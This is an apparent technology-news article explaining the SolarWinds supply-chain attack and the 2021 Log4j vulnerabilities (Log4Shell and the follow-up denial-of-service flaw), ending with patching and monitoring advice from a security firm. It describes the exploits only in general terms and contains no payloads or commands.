Reports of major cyberattacks make the evening (and online) news all too often. Identity theft in the millions, ransomware demanding millions, millions of people left without electricity due to an attack on the grid. Where do these attacks come from? And how?
The usual suspect is an undiscovered—until now—fault or vulnerability in a common program. The 2021 SolarWinds attack is a case in point. It was one of the most sophisticated cyberattacks ever conducted, an example of a digital supply-chain attack, in which hackers insert malicious code into trusted third-party software, thus infecting potentially all of the hacked software company’s customers.
SolarWinds, based in Austin, Texas, provides large-scale information technology infrastructure management software and services to businesses and government agencies with more than 320,000 customers in 190 countries, including 499 of the Fortune 500. The SolarWinds attack affected federal agencies, the federal courts, numerous private-sector companies, and state and local governments across the country. Government agencies confirmed to be affected by the attack include: the Depts. of Commerce, Defense, Energy, Homeland Security, Justice, Labor, State, and Treasury, as well as the National Institutes of Health.
Hackers had inserted malicious code into an update for SolarWinds’ Orion network management platform. Customers who routinely updated their Orion software unknowingly downloaded the embedded virus into their systems. Once inside, the attackers could choose which areas to access and were able to move through systems and conduct their operations undetected.
Cybersecurity agencies and companies are constantly monitoring the “Dark Net,” a term for the underbelly of the Internet where anything goes and everything has a price, for leads to newly discovered vulnerabilities in third-party software connected to the World Wide Web. As an example, in December 2021, the Apache Software Foundation found two critical vulnerabilities in its Log4j Java-based library.
The first vulnerability CVE-2021-44228, also known as Log4Shell or LogJam, was reported as an unauthenticated RCE (remote code execution) vulnerability. By exploiting how the library logs error messages, it could lead to a complete system takeover. Due to its critical nature and the ease of execution, it has received the highest possible CVSS (Common Vulnerability Scoring System) score of 10.
The second vulnerability, CVE-2021-45046, was discovered shortly after the initial exploit was patched. It is rated 3.7 out of 10 on the CVSS and would lead to a denial of service). Patches were quickly released to address both vulnerabilities.
If the problem has been patched, why worry? Log4j is the world’s most popular Java logging library and is embedded on a range of applications, services, and websites, including Apple, Amazon, Twitter, and Microsoft’s Minecraft game. Its adaptable logging capabilities make it useful across any type of infrastructure or application.
Worse, to exploit the flaw all that needs to be done is to create a line of malicious code. That code will be logged by Log4j, giving the hackers an entry point into the affected device. After that, the hackers have the means to execute arbitrary code to take possession of the entire system, including encrypting files (and holding them for ransom).
In an effort to illustrate how easy it is to exploit Log4j’s flaw, Wired magazine reported that some Twitter users were changing their names to code strings that could be used to trigger the exploit. Screenshots from the game Minecraft, too, showed players exploiting the flaw from the game’s chat function.
And the exploits didn’t take long to surface. As soon as the PoC (proof of concept) exploit was released on Github, hackers began actively scanning the internet for vulnerable assets. Several national cybersecurity agencies have issued warnings about the Log4j vulnerability, and there is clear evidence that hackers are developing targeted strategies to exploit the flaw. For instance, the botnet Mirai, which targets IoT connected devices, has already created an exploit to target the flaw.
As a result, companies have been rapidly patching their software, but, as is common, it takes time and talent—and determination—to patch code. Tens of thousands of programs are still unpatched.
It’s important to recognize that the flaw is with Log4j versions 2.14.1 and below. Apache has called on all developers to install the most recent version of the library, Log4j 2.15.0. However, the potential scope of the vulnerability CVE-2021-44228 is critical. Any device or app connected to the internet running Log4j versions 2.0-2.14.1, is at risk.
In addition, exploiting the vulnerability is relatively straightforward. By simply sending a malicious string that then gets logged by the application, attackers can exploit a feature in log4j that can be used to retrieve information.
The second vulnerability, CVE-2021-45046, was uncovered shortly after the initial patch was released. The initial patch was “incomplete” and this new exploit could allow attackers to craft malicious input data using a JNDI lookup pattern resulting in a denial of service (DOS) attack.
According to Lookout, a cybersecurity firm, there are several key actions users need to take—and that many have not taken even yet. Naturally, the prime action is to update any server, application, or resource that uses Log4j with the latest patch immediately. This patch includes coverage for both the latest DOS vulnerability and the original RCE vulnerability.
To mitigate against the possibility of data exfiltration, organizations should restrict access to its apps running on IaaS (Infrastructure-as-a-Service) and on-premises data centers by implementing user-to-app segmentation.
Organizations should implement defense-in-depth strategies by closely monitoring both the user and app behaviors. By flagging behavior indicative of an exploit, such as an anomalous login location or unusual file download volume, you will be able to detect and respond to malicious activities across your cloud and on-prem infrastructure as well as your endpoint devices.
Want to tweet about this article? Use hashtags #construction #IoT #sustainability #AI #5G #cloud #edge #futureofwork #infrastructure